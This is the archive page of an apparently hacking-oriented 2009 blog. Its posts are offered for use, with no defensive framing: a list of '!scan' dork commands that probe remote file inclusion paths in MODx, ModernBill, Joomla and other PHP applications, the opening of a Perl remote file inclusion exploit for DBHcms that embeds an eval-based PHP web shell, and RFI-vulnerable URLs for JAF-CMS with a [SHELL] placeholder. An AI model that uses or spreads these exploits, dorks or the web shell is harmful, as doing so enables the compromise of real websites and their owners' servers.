More Than Just A Blog

Archive for January 1st, 2009

Protected: sock 5 fresh 31 dec 2008

Posted by: Bug Dork on: January 1, 2009

There is no excerpt because this is a protected post.

Tags: ,

just click HERE

Tags: , ,

December 2008 bug dork list

Posted by: Bug Dork on: January 1, 2009

Last Update 17-12-2008
http://bugdork.wordpress.com/

!scan ///////?cmd&file= “List Users with Pics only?”
!scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= /MODx/
!scan /include/scripts/export_batch.inc.php?DIR= ModernBill
!scan /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path= technote7
!scan /?sIncPath= “BoonEx- Community Software; Dating And Social Networking Scripts; Video Chat And More.”
!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal Newsmanagement – © 2002-2004 by Christian Scheb – Stylemotion.de
!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal Newsmanagement
!scan ?custompluginfile[]= index.php?categoryid=5
!scan ?custompluginfile[]= index.php?categoryid=10
!scan ?custompluginfile[]= index.php?categoryid=15
!scan index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path= %22%2Fincludes%2Fjoomla.php%22
!scan /parse/parser.php?WN_BASEDIR= WEB//NEWS Personal [...]

Tags: ,

DBHcms <= 1.1.4 Remote File Inclusion exploit

Posted by: Bug Dork on: January 1, 2009

#!/usr/bin/perl
# DBHcms <= 1.1.4 Remote File Inclusion exploit
# Vendor url: www.drbenhur.com
#
# exploit is hard to execute through a browser -possible though- since it’s with POST
# ~Iron
# http://www.randombase.com
require LWP::UserAgent;
#Shell:
# <?php if(!empty($_GET['do'])){eval($_GET['do']);}?>
$shell_url = “http://localhost/s.txt”;

print “#
# DBHcms <= 1.1.4 Remote File Inclusion exploit
# By Iron – randombase.com
# Greets to everyone at RootShell Security Group
#
# Example target url: http://www.target.com/dhbcms/
Target url?”;
chomp($target=<stdin>);
if($target !~ /^http:\/\//)
{
$target [...]

Tags: , ,

RFI VULN JAF-CMS 4.0 RC2

Posted by: Bug Dork on: January 1, 2009

Script : JAF-CMS 4.0 RC2
Download : SourceForge.net
Method : GET
Critical : High
Impact : System access

http://localhost/path/module/forum/forum.php?website=[SHELL]
http://localhost/path/module/forum/forum.php?main_dir=[SHELL]
http://localhost/path/module/forum/headlines.php?website=[SHELL]
http://localhost/path/module/forum/headlines.php?main_dir=[SHELL]
http://localhost/path/module/forum/main.php?website=[SHELL]
http://localhost/path/module/forum/main.php?main_dir=[SHELL]

milw0rm.com

Tags: , , ,

 

January 2009
M T W T F S S
« Dec   Feb »
 1234
567891011
12131415161718
19202122232425
262728293031  

Archives

Blog Stats

  • 108,480 hits